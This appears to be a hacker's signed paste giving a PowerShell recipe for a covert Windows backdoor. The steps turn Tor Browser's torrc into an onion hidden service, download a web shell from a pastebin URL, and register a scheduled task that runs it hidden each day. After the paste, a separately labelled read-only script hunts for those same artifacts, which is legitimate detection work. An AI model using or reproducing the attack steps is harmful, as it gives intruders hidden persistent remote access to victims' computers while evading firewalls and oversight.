- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA512
- Vegeta_Ssj: Windows Backdoor without Admin, Bypass FW with Tor Browser
- email: vegeta_ssj@riseup.net
- jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
- https://i.postimg.cc/g2RpjWTZ/webshell.png
- Find torrc file:
- PS C:\Users\IEUser> Get-Childitem -recurse -filter torrc
- Directory: C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor
- Mode LastWriteTime Length Name
- ---- ------------- ------ ----
- -a---- 6/29/2020 12:44 PM 3060 torrc
- Left surprise:
- $torrcpath = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc"
- $conf = "HiddenServiceDir C:/Users/IEUser/Desktop/Tor Browser/Browser/TorBrowser/Data/Hidden`nHiddenServicePort 80 127.0.0.1:8080"
- $conf | Add-Content -Path $torrcpath
- $hostname = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Hidden\hostname"
- PS C:\Users\IEUser\> cat $hostname
- 4jq55x4lxjhvsbjhqdsjxsevswx34fdt2xjyuduo6tr2www2p3owk8qd.onion
- Download webshell:
- $url = "https://pastebin.com/raw/h59LJpni";$output ="$pwd\web-shell.ps1"
- Invoke-WebRequest -Uri $url -OutFile $output
- Create backdoor | scheduled task:
- PS C:\Users\IEUser\Desktop> schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\web-shell.ps1" /ST 15:27
- SUCCESS: The scheduled task "Legit as Fucked" has successfully been created.
- #start-process PowerShell.exe -arg $pwd\web.ps1 -WindowStyle Hidden
- Enjoy :)
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----
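For defenders, an added hunting example (not part of the paste): a read-only PowerShell script that looks for the two persistence artifacts the steps above leave behind, `HiddenService*` directives in a `torrc` under a user profile and a scheduled task that starts PowerShell with a hidden window. The `C:\Users` root and the function names are assumptions of this example.

```powershell
# Added hunting example, not from the paste. Read-only: it reports and changes nothing.
# Assumption: user profiles live under C:\Users.
$ProfileRoot = 'C:\Users'

function Find-TorHiddenService {
    param([string]$Root = $ProfileRoot)
    # A torrc that only serves a browser has no reason to publish an onion
    # service, so any HiddenServiceDir/HiddenServicePort line is worth review.
    Get-ChildItem -Path $Root -Recurse -Filter torrc -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            Select-String -LiteralPath $file.FullName -Pattern '^\s*HiddenService(Dir|Port)\s+\S' |
                ForEach-Object {
                    [pscustomobject]@{
                        Finding   = 'Onion service configured in torrc'
                        Location  = $file.FullName
                        Timestamp = $file.LastWriteTime
                        Detail    = $_.Line.Trim()
                    }
                }
        }
}

function Find-HiddenPowerShellTask {
    # Heuristic: a task action that starts PowerShell with -WindowStyle Hidden
    # (or an abbreviation such as -w hidden), as the schtasks.exe line above does.
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match '\b(powershell|pwsh)(\.exe)?\b' -and
                $cmd -match '[-/]w[a-z]*\s+hidden\b') {
                [pscustomobject]@{
                    Finding   = 'Scheduled task runs PowerShell hidden'
                    Location  = "$($task.TaskPath)$($task.TaskName)"
                    Timestamp = $task.Date   # registration date, may be empty
                    Detail    = $cmd
                }
            }
        }
    }
}

@(Find-TorHiddenService) + @(Find-HiddenPowerShellTask) |
    Format-List Finding, Location, Timestamp, Detail
```

Run it from an elevated session to cover every profile and task; a standard user only sees its own profile and the tasks it is allowed to read.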